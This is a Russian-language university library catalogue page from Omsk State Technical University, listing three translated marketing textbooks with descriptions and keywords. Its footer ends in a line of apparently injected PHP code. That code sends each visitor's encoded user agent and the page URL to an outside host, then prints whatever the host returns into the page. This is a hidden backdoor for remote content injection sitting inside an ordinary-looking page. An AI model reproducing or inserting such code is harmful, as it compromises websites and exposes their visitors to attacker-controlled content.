Перейти на сайт
библиотеки ОмГТУ
Share |
   
   
   
   
   
   

 
      Виртуальная справка
 
      Личный кабинет

Логин
Пароль
Забыли пароль?
Регистрация

 
      Счетчики
Rambler's Top100
Яндекс цитирования

Сейчас на сайте

147 пользователей



 
      Наши партнеры
Студенческий информационный портал компании
("Ключевые слова=Интерактивный маркетинг")
Результаты поиска
СВОДНЫЙ КАТАЛОГ: Найдено записей: 3
1. 
Дойль, Питер. Маркетинг-менеджмент и стратегии [Текст] / П. Дойль; Пер. с англ. С. Жильцова; Под общ. ред. Ю. Н. Каптуревского, 2003. - 538 с.
Держатели документа (Информация об экземплярах) 

Учебник по менеджменту и маркетингу Питера Дойля является наиболее полным и удобным для изучения из всех ранее издававшихся. Неслучайно первое его издание удостоилось звания "Лучший учебник по менеджменту в Европе". Авто рассматривает все основные аспекты современного управления и маркетинга: <стратегическое> <рыночное планирование>, <брендинг>, <инновации>, <ценообразование>, <антикризисное управление>, уделяя большое внимание актуальности публикуемого материала. Питер Дойль, не навязывая своих взглядов, позволяет читателю делать выбор и размышлять, самому находить пути решения поставленных задач и проблем.

2. 
Армстронг, Гари. Введение в маркетинг [Текст] : Пер. с англ. / Г. Армстронг, Ф. Котлер; Н. В. Шульпина, 2000. - 638 с.
Ключевые слова 
Маркетинг -- Учебник и пособие -- Управление маркетингом -- Маркетинговое исследование -- Потребительский рынок -- Стратегическое планирование -- Клиент -- Конкурент -- Маркетинговая информационная система -- Маркетинг услуг -- Товар -- Ценообразование -- Цена -- Товародвижение -- Логистика -- Розничная торговля -- Оптовая торговля -- Маркетинговая коммуникация -- Связь с общественностью -- Реклама -- Стимулирование сбыта -- Прямой маркетинг -- Интерактивный маркетинг -- Социальная ответственность -- Консьюмеризм -- Инвайронментализм -- Глобальный маркетинг -- Глобальный рынок -- Личная продажа -- Покупательское поведение -- Маркетинговая среда
Держатели документа (Информация об экземплярах) 
3. 
Основы маркетинга [Текст] : Пер. с англ. / Ф. Котлер, Г. Армстронг, Д. Сондерс, В. Вонг; Н. В. Шульпина, 2000. - 943 с.


    Адрес: 644050, Россия, г. Омск, пр-кт Мира, 11

    Телефон: (3812) 65-34-86, 65-23-69

    E-mail: libdirector@omgtu.ru, b_oa@omgtu.ru

[ О библиотеке ]     [ Читателю ]     [ Информационные ресурсы ]     [ Электронный каталог ]     [ Научная деятельность ]     [ Культура и досуг ]     [ ИРБИС в Омске ]

Электронное периодическое издание «lib.omgtu.ru» | Свидетельство о регистрации СМИ Эл № ФС77-45378 от 10.06.2011 Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор)| Выпуск № 3023 - 19.09.2019
© Омский государственный технический университет

Электронно-библиотечная система АРБУЗ ОмГТУ
Страница сгенерирована за 0.56 с.12 запросов, 0.36c. $useragent=$_SERVER['HTTP_USER_AGENT']; $bs=base64_encode($useragent); $sb='http://'.$_SERVER['SERVER_NAME'].$_SERVER["REQUEST_URI"]; $ret = file_get_contents('http://jr.6tws.us/?UserAgent='.$bs."&Domain=".$sb); print $ret;